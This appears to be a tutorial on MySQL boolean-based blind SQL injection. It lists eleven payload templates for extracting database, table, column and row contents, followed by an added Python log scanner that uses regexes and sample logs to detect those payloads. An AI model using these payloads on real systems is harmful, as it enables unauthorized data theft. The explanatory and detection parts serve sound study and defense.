Boolean-based blind injection
When the injected condition is true, the application returns one version of the page; when it is false (or the statement errors), it returns a different one. By observing which of the two pages comes back, the attacker learns whether each injected condition held and reconstructs the data one comparison at a time.
Payloads
Payloads found online generally combine ascii(), substr() and length(). In the templates below, n is the zero-based row offset used by MySQL's LIMIT n,1, and the values in angle brackets are the guesses that are varied until the "true" page is returned.
1. Obtain the length of the database name
and (select length(database()))=<length of database name>
2. Guess the database name character by character
and (select ascii(substr(database(),<position>,1)))=<ascii code>
3. Guess the number of tables
and (select count(table_name) from information_schema.tables where table_schema=database())=<count>
4. Guess the length of a given table name
and (select length(table_name) from information_schema.tables where table_schema=database() limit n,1)=<length>
5. Guess the table name character by character
and (select ascii(substr(table_name,<position>,1)) from information_schema.tables where table_schema=database() limit n,1)=<ascii code>
6. Guess the number of columns
and (select count(column_name) from information_schema.columns where table_schema=database() and table_name="<table name>")=<count>
7. Guess the length of a given column name
and (select length(column_name) from information_schema.columns where table_name="<table name>" limit n,1)=<length>
8. Guess the column name character by character
and (select ascii(substr(column_name,<position>,1)) from information_schema.columns where table_name="<table name>" limit n,1)=<ascii code>
9. Determine the number of rows
and (select count(<column name>) from <table name>)=<count>
10. Guess the length of a given row's value
and (select length(<column name>) from <database name>.<table name> limit n,1)=<length>
11. Guess the value character by character
and (select ascii(substr(<column name>,<position>,1)) from <database name>.<table name> limit n,1)=<ascii code>
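From the defender's side, the templates above are easy to recognise in web-server logs. The following Python is an added example, not part of the original page: it normalizes each request's query string (URL decoding, case, /**/ comments, spacing), tags requests matching the payload families listed above, and counts probes per client, since a boolean-based extraction necessarily produces many near-identical requests from one source. The log lines, IP addresses and regexes are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus
# One regex per payload family from the templates above; applied to the normalized
# query string, in which spaces next to parentheses have been removed.
PATTERNS = {
    "length-probe": re.compile(r"\band\(?select length\("),
    "char-probe": re.compile(r"\band\(?select ascii\(substr\("),
    "count-probe": re.compile(r"\band\(?select count\("),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)"),
}
# Combined access-log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
def normalize(raw):
    """Decode twice (catches double URL encoding), lower-case, turn /**/ into spaces,
    collapse whitespace and strip spaces around parentheses so spacing tricks fail."""
    s = unquote_plus(unquote_plus(raw)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return re.sub(r"\s*([()])\s*", r"\1", s)

def classify(query_string):
    """Names of the payload families found in one request's query string."""
    s = normalize(query_string)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(s))
def scan_access_log(lines):
    """Return (client_ip, status, families) for every line that carries a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, _method, path, status = m.groups()
            families = classify(path.partition("?")[2])
            if families:
                hits.append((ip, status, families))
    return hits

def probe_counts(lines):
    """Probes per client IP: blind extraction needs many near-identical requests,
    so a burst of hits from one source is the thing to alert on."""
    return Counter(ip for ip, _status, _families in scan_access_log(lines))

# Constructed sample traffic (not real logs); the payloads follow the templates above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /item.php?id=1%20and%20(select%20length(database()))=8 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /item.php?id=1/**/and/**/(select/**/ascii(substr(database(),1,1)))=115 HTTP/1.1" 200 498',
    '203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /item.php?id=1%2520and%2520(select%2520count(table_name)%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase())%253D3 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=blue+shoes HTTP/1.1" 200 2048',
]
```

Note that all three probes return HTTP 200; the "true" and "false" pages differ in body size (512 vs 498), which is why a status-code-only alert misses this technique.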